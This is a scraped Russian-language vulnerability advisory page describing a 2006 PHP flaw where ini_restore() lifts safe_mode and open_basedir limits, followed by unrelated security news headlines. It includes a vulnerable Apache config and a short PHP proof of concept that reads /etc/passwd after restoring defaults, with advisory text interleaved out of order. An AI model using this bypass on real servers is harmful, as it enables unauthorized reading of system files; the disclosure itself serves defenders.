РУС |
ENG
Уязвимости / Web приложения
SQL injection vulnerability in index.php in Kayako eSupport 3.70.02 allows remote attackers to execu ...
SQL injection vulnerability in index.php in Kayako eSupport 3.70.02 allows remote attackers to execu ...
SQL injection vulnerability in the Ozio Gallery (com_oziogallery) component for Joomla! allo ...
SQL injection vulnerability in ttvideo.php in the TTVideo (com_ttvideo) component 1.0 for Jo ...
Троянская программа, которая без ведома пользователя скачивает на компьютер другое программное обесп ...
Троянская программа, которая скачивает и устанавливает другие вредоносные программы на компьютер без ...
Программа-эксплоит, использующая для своего выполнения на компьютере пользователя уязвимость в Java ...
dumprep.exe – файл, являющийся частью операционной системы Microsoft Windows XP и более поздних верс ...
Программа отвечает за обработку COM+ процессов в Internet Information Services (IIS) и других програ ...
Cthelper.exe – драйвера для Creative SoundBlaster.
10 сентября, 2006
Программа:
PHP 4.4.4 и более ранние версии
PHP 5.1.6 и более ранние версии
Опасность: Низкая
Наличие эксплоита: Да
Описание:
Уязвимость позволяет удаленному пользователь получить доступ к важным данным на системе.
Уязвимость существует из-за недостаточного ограничения на смену параметров safe_mode и open_basedir в функции ini_restore(). Если эти ограничения установлены в настройках виртуального хоста Web сервера, а в файле php.ini находятся значения по умолчанию, злоумышленник может восстановить значения по умолчанию и обойти ограничения, установленный в конфигурационном файле Web сервера. Пример уязвимой конфигурации:
<Directory /usr/home/frajer/public_html/>Эксплоит:
Options FollowSymLinks MultiViews Indexes
AllowOverride None
php_admin_flag safe_mode 1
php_admin_value open_basedir /usr/home/frajer/public_html/
</Directory>
<?Удачная эксплуатация уязвимости позволит злоумышленнику получить доступ к содержимому произвольных файлов на системе.
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include("/etc/passwd");
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include("/etc/passwd");
?>
URL производителя: www.php.net
Решение: Способов устранения уязвимости не существует в настоящее время.
Источники:
CVE:
Специалисты кафедры информационных технологий Нижегородского института развития образования (НИР ...
Центральный районный суд Комсомольска-на-Амуре решил перенять опыт китайских коллег и обязал местног ...
Известный православный священник Александр Шумский призывает государство прекратить беспредел в Сети ...
Священнослужителям следует заходить в социальные сети только для того, чтобы нести слово Божие, заяв ...
Сегодня компания Blizzard официально выпустила в продажу вторую версию легендарной стратегии Starcra ...
Популярная CMS Wordpress, распространяемая под лицензией GPL оказалась в центре скандала. Система уп ...
Российские власти озвучили план создания национальной операционной системы на базе существующей ОС L ...
Информация о группе из шести человек, которые могут перезагрузить мировой Интернет, не соответствует ...
Росохранкультура завершила прием заявок на сбор авторских отчислений с производителей и импортеров а ...
Рекордные результаты квартала, объявленные корпорацией Microsoft в четверг, не позволили Apple обой ...
Теодор Тсо, один из ключевых разработчиков Linux-ядра, высказал мнение, что пользователям операционн ...
Американские ученые подсчитали, что при нынешних темпах роста Сети оставшихся незанятыми IP-адресов ...